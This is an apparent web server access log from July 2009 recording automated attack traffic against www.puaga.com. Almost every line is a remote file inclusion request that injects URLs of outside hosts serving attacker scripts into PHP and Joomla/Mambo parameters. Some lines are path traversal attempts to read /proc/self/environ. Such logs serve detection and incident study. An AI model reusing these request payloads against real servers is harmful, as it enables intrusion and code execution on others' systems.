88.191.37.60 - - [05/Jul/2009:08:45:13 -0700] "GET /logs/access_090514.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:45:13 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:10 -0700] "GET /logs/access_090514.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:10 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:16 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:18 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:23 -0700] "GET /logs/access_090514.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:47:23 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:37 -0700] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:38 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:42 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:50 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:47:52 -0700] "GET /logs/access_090525.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:48:10 -0700] "GET /logs/access_090529.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:48:36 -0700] "GET /logs/access_090525.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:51:05 -0700] "GET /logs/access_090520.log/index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:51:05 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:51:05 -0700] "GET /index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.803" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:51:13 -0700] "GET /logs/access_090623.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:51:13 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:51:14 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:27 -0700] "GET /logs/access_090616.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:28 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:34 -0700] "GET /logs/access_090622.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:39 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:39 -0700] "GET /logs/access_090616.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:40 -0700] "GET /logs/access_090622.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:51:40 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:51:40 -0700] "GET /logs/access_090526.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:51:40 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:45 -0700] "GET /logs/access_090601.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:45 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:51:51 -0700] "GET /logs/access_090603.log%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:08:52:01 -0700] "GET /logs/access_090516.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:52:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:52:03 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:52:03 -0700] "GET /skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:52:05 -0700] "GET /logs/access_090519.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:52:31 -0700] "GET /logs/access_090622.log/index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:08:52:40 -0700] "GET /logs/access_090517.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:08:52:40 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:08:52:40 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:08:52:43 -0700] "GET /logs/access_090525.log//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:08:52:49 -0700] "GET /logs/access_090529.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:08:52:50 -0700] "GET /logs/access_090513.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:08:52:51 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:53:01 -0700] "GET /logs/access_090622.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:53:02 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:53:02 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:53:14 -0700] "GET /logs/access_090517.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:53:14 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:53:14 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:53:17 -0700] "GET /logs/access_090611.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:08:53:18 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:54:20 -0700] "GET /logs/access_090518.log/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:54:21 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:54:22 -0700] "GET /logs/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:54:24 -0700] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:54:26 -0700] "GET /logs/access_090517.log/includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:08:54:26 -0700] "GET /includes/functions_admin.php?phpbb_root_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:55:44 -0700] "GET /logs/access_090609.log/?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:55:45 -0700] "GET /logs/access_090622.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:08:55:55 -0700] "GET /logs/access_090611.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:08:56:02 -0700] "GET /logs/access_090615.log%20/index.php?option=com_custompages&cpage=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:08:56:02 -0700] "GET /logs/access_090521.log%20/index.php?option=com_custompages&cpage=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:08:56:02 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:08:56:03 -0700] "GET /index.php?option=com_custompages&cpage=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 200 6125 "-" "libwww-perl/5.803" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:56:48 -0700] "GET /logs/access_090531.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:57:42 -0700] "GET /logs/access_090529.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:57:42 -0700] "GET /logs/access_090529.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:57:59 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:57:59 -0700] "GET /logs/access_090617.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:01 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:02 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /logs/access_090517.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:09 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:10 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:11 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:11 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:11 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:11 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
61.106.21.35 - - [05/Jul/2009:08:58:11 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:58:18 -0700] "GET /logs/access_090618.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:58:42 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:58:43 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:58:44 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:58:58 -0700] "GET /logs/access_090618.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.51.114 - - [05/Jul/2009:08:59:18 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:59:47 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:59:48 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:08:59:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:09:00:52 -0700] "GET /logs/access_090618.log//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:30 -0700] "GET /logs/access_090515.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:30 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:30 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:09:02:36 -0700] "GET /logs/access_090526.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:50 -0700] "GET /logs/access_090515.log/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:50 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:53 -0700] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:02:54 -0700] "GET /logs/access_090606.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:09:02:58 -0700] "GET /logs/access_090517.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.64.102.151/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:09:02:59 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.64.102.151/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
